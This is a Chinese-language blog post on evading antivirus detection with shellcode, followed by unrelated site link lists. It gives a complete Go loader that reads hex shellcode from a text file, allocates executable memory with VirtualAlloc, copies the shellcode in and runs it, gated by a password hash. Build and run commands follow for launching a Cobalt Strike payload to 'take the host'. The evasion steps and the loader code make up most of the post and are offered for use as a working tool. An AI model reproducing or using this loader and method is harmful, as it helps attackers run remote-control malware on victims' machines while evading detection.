ShellCode免杀的骚姿势

常见的免杀手法:

shellcode(攻击代码)和加载程序的分离;
Lolbins白利用加载shellcode(白名单利用);
shellcode混淆、编码解码;

shellcode(攻击代码)和加载程序的分离

生成一个C语言的playload做测试实验;

本质上生成c的payload就是16进制的代码,这些代码插入目标主机的内存中,就能触发CS远控;

这里我们在来看下官方的定义;

shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。

但shellcode类似于图纸,本身并不能进行执行,必须要配合加载器才能进行使用,所以一般杀软不会杀shellcode;exe文件就是shellcode+加载器一起集成了,容易被查杀;

单独的加载器可以使用go-shellcode-launcher

package main

import (
"io/ioutil"
"os"
"syscall"
"unsafe"
"strings"
"fmt"
"encoding/hex"
"crypto/md5"
) const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
) func checkErr(err error) {
if err != nil {
if err.Error() != "The operation completed successfully." {
println(err.Error())
os.Exit(1)
}
}
}
func main() { if len(os.Args) <= 2 {
os.Exit(0)
} //var shellcodes string
var shellcode []byte if len(os.Args) > 2 {
data := []byte(os.Args[1])
has := md5.Sum(data)
md5str1 := fmt.Sprintf("%x", has) //将[]byte转成16进制
if (md5str1) != "81592ae4e09eb3dfb96aaecbf84730d0" {
//第一个参数只有是 bobohacker 才能跑起
os.Exit(0)
} if fileObj, err := os.Open(os.Args[2]); err == nil {
//第二个参数为放shellcode的txt文件名
defer fileObj.Close()
if contents, err := ioutil.ReadAll(fileObj); err == nil {
shellcodes := strings.ReplaceAll(string(contents), "\n", "")
shellcodes = strings.ReplaceAll(string(shellcodes), "\\x", "")
shellcode, _ = hex.DecodeString(shellcodes)
} }
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
checkErr(err)
syscall.Syscall(addr, 0, 0, 0, 0)
}

继续生成payload123.c,然后将payload的内容复制出来,放在bobo.txt中

将go的文件编译成exe文件

go build golauncher.go

然在目录下执行

golauncher.exe bobohacker bobo.txt
其中的bobohacker是密码;

然后就触发shell,拿下主机;

最新文章

  1. Android多种进度条使用详解
  2. 夺命雷公狗-----React---19--表单的值的修改
  3. 支持10种格式的 HTML 表格导出 jQuery 插件
  4. 遍历进程活动链表(ActiveProcessLinks)、DKOM隐藏进程
  5. WindowsPhone-GameBoy模拟器开发四--Gameboy显示系统分析
  6. R处理xml文件
  7. Lucene.Net 2.3.1开发介绍 —— 四、搜索(一)
  8. hdu 1224 Free DIY Tour(最长的公路/dp)
  9. Unreal Engine 4 C++ 能够创建角色Zoom摄像头(资源)
  10. js监听事件 上滑消失下滑出现的效果 触摸与手势事件
  11. PHP和Redis实现在高并发下的抢购及秒杀功能示例详解
  12. ASP.NET Core 登录失败。该登录名来自不受信任的域,不能与集成身份验证一起使用。
  13. 一张图告诉你:Android系统哪代强?
  14. JAVA学习(七)__Spring的@Autowired注入规则
  15. 程序媛计划——python中级课时1
  16. squid 高匿设置
  17. dubbo可通过指定Url方式绕过注册中心直连指定的服务地址
  18. 《Java程序设计》实验1实验报告
  19. 开窗函数over()
  20. servlet 与 tomcat版本不匹配的问题

热门文章

  1. Exception Handling Considered Harmful
  2. GUI-适配器设计模式-事件处理
  3. vue单文件组件形成父子(子父)组件之间通信(vue父组件传递数据给子组件,子组件传递数据给父组件)
  4. Mxnet速查_CPU和GPU的mnist预测训练_模型导出_模型导入再预测_导出onnx并预测
  5. Unable to negotiate with xx.xxx.xxxx port 22: no matching host key type found. Their offer: ssh-rsa(解决的两种方式)
  6. 设置IDEA启动时不打开上次项目
  7. MySql各版本
  8. 在线操作word和在线预览查找的资料记录
  9. event 事件对象
  10. 动手动脑3&amp;课堂作业(四则运算与继承)